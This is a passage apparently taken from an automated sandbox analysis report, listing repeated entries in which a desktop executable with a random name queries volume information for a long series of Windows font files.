          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
